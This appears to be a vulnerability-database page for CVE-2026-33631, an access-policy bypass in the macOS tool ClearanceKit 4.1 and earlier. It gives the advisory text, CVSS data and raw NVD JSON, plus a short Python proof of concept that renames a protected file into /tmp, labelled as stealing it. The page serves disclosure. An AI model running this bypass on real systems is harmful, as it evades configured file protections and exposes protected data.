CVE-2026-33631

Description

ClearanceKit intercepts file-system access events on macOS and enforces per-process access policies. In versions on the 4.1 branch and earlier, the opfilter Endpoint Security system extension enforced file access policy exclusively by intercepting ES_EVENT_TYPE_AUTH_OPEN events. Seven additional file operation event types were not intercepted, allowing any locally running process to bypass the configured FAA policy without triggering a denial. Commit a3d1733 adds subscriptions for all seven event types and routes them through the existing FAA policy evaluator. AUTH_RENAME and AUTH_UNLINK additionally preserve XProtect change detection: events on the XProtect path are allowed and trigger the existing onXProtectChanged callback rather than being evaluated against user policy. All versions on the 4.2 branch contain the fix. No known workarounds are available.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:craigjbass:clearancekit:*:*:*:*:*:*:*:* - VULNERABLE

ClearanceKit 4.1及更早版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-33631: ClearanceKit Policy Bypass
# Description: This script demonstrates bypassing the file access policy
# by using file operations not monitored by the vulnerable opfilter.
# Instead of 'open', it uses 'rename' or 'unlink' which were missing from the monitor list.

import os

def bypass_policy(source_path, target_path):
    try:
        # The vulnerable version only checks ES_EVENT_TYPE_AUTH_OPEN.
        # Operations like rename (ES_EVENT_TYPE_AUTH_RENAME) were unchecked.
        os.rename(source_path, target_path)
        print(f"[+] Success: Bypassed policy and renamed {source_path} to {target_path}")
        return True
    except Exception as e:
        print(f"[-] Failed: {e}")
        return False

if __name__ == "__main__":
    # Example usage on a macOS system with vulnerable ClearanceKit
    protected_file = "/protected/secret.txt"
    new_location = "/tmp/stolen_secret.txt"
    bypass_policy(protected_file, new_location)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33631
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33631
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33631/
[4] VulDB https://vuldb.com/cve/CVE-2026-33631
[5] https://github.com/craigjbass/clearancekit/commit/a3d1733d2691a0d40209c48b01bf9291bf645207
[6] https://github.com/craigjbass/clearancekit/security/advisories/GHSA-25f8-8cj2-m887

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33631", "sourceIdentifier": "[email protected]", "published": "2026-03-26T20:16:16.110", "lastModified": "2026-04-20T20:22:55.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ClearanceKit intercepts file-system access events on macOS and enforces per-process access policies. In versions on the 4.1 branch and earlier, the opfilter Endpoint Security system extension enforced file access policy exclusively by intercepting ES_EVENT_TYPE_AUTH_OPEN events. Seven additional file operation event types were not intercepted, allowing any locally running process to bypass the configured FAA policy without triggering a denial. Commit a3d1733 adds subscriptions for all seven event types and routes them through the existing FAA policy evaluator. AUTH_RENAME and AUTH_UNLINK additionally preserve XProtect change detection: events on the XProtect path are allowed and trigger the existing onXProtectChanged callback rather than being evaluated against user policy. All versions on the 4.2 branch contain the fix. No known workarounds are available."}, {"lang": "es", "value": "ClearanceKit intercepta eventos de acceso al sistema de archivos en macOS y aplica políticas de acceso por proceso. En versiones de la rama 4.1 y anteriores, la extensión de sistema de seguridad de punto final opfilter aplicaba la política de acceso a archivos exclusivamente interceptando eventos ES_EVENT_TYPE_AUTH_OPEN. Siete tipos de eventos de operación de archivo adicionales no eran interceptados, permitiendo que cualquier proceso ejecutándose localmente eludiera la política FAA configurada sin activar una denegación. El commit a3d1733 añade suscripciones para los siete tipos de eventos y los enruta a través del evaluador de políticas FAA existente. AUTH_RENAME y AUTH_UNLINK adicionalmente preservan la detección de cambios de XProtect: los eventos en la ruta de XProtect son permitidos y activan la devolución de llamada onXProtectChanged existente en lugar de ser evaluados contra la política de usuario. Todas las versiones de la rama 4.2 contienen la corrección. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craigjbass:clearancekit:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.2", "matchCriteriaId": "066D1D07-3F88-4030-976D-C3141AA86CB0"}]}]}], "references": [{"url": "https://github.com/craigjbass/clearancekit/commit/a3d1733d2691a0d40209c48b01bf9291bf645207", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/craigjbass/clearancekit/security/advisories/GHSA-25f8-8cj2-m887", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}